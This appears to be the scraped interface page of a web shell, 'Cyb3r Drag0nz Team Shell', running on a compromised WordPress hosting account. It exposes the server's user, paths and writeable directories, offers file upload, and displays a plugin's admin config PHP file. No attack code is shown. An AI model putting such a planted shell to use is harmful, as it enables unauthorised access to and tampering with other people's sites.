Google

Cyb3r Drag0nz Team Shell

Server : Apache
System : Linux webd003.cluster126.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : atwiofrxug (73666)
PHP Version : 8.4.10
Disable Functions : _dyuweyrj4,_dyuweyrj4r,dl
Current Directory : /home/atwiofrxug/mylittletelaviv/wp-content/plugins/event-calendar-wd/views/admin/
Directory Status: Writeable | Document Root: Writeable

Upload File







Viewing: /home/atwiofrxug/mylittletelaviv/wp-content/plugins/event-calendar-wd/views/admin/ecwd-config.php

<?php
if ($response) {
    foreach ($response as $text) {
        var_dump($response);
    }
}
?>
<form method="post" action="<?php echo $action; ?>">
    <table style="width:100%;">
        <tbody>
            <tr>
                <td><?php _e('Name','event-calendar-wd');?></td>
                <td><?php _e('Description','event-calendar-wd');?></td>
                <td style="width:20%;"><?php _e('Value','event-calendar-wd');?></td>
            </tr>
            <?php
            foreach ($configs as $id => $conf) {
                ?>  
                <tr>                
                    <td><?php echo $conf['name']; ?></td>                
                    <td><?php echo $conf['description']; ?></td>                
                    <td>
                        <input type="text" name="<?php echo $id; ?>" 
                               value="<?php echo $conf['value'] ?>" />
                    </td>                                
                </tr>
                <?php
            }
            ?>        
        </tbody>
    </table>
    <input type="submit" value="Save" />
</form>

Cyb3r Drag0nz Team • Google Edition